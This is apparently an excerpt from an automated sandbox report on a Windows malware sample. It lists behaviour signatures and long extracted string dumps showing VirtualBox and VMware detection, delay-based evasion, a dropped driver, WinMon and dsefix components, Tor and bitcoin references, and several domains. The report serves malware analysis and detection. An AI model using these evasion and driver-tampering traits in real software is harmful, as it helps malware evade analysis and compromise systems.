Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 807	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 479
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1317
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 814
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3039
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 853
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 860
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4495
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1561
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2457
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6162
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5325
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2634
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5975
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2153
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 7888
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5121
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5080
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2943

Source: C:\Program Files\Google\Chrome\updater.exe

Dropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sys

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	File opened / queried: VBoxGuest
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	File opened / queried: VBoxTrayIPC
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	File opened / queried: VBoxMiniRdrDN

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Evaded block: after key decision

graph_3-10011

Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	API call chain: ExitProcess graph end node			graph_2-3224
Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	API call chain: ExitProcess graph end node			graph_2-2972

Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: sbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--P
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstart task: %wstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: psapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= p
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: STAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00 %+v m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3ca
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie$WINDIR% CPU (%03d %s%v: %#x, goid=, j0 = -nologo/delete19531252.5.4.32.5.
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: ameNewaPINGPOSTPathQEMUROOTH
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: ersexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindo
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: popcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: 11VBoxSFWINDIRWD
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: pclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: sse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BE
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: LycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd acceptactivechan<-closedcookiedirectdo
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: aryvmcixn-SR-%W
Source: file.exe, 00000000.00000000.2090227189.0000000001282000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: vmware
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s\|%s%s\|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: main.isRunningInsideVMWare
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: 4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: rSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s%d%s/%s%s:%d%s=%s"'&+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:**@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: tVMSrvcs\|!
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: 3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: ermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: yreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdo
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: sse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s"'&+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.2500
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthorities
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	Binary or memory string: vmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ... exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ><'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
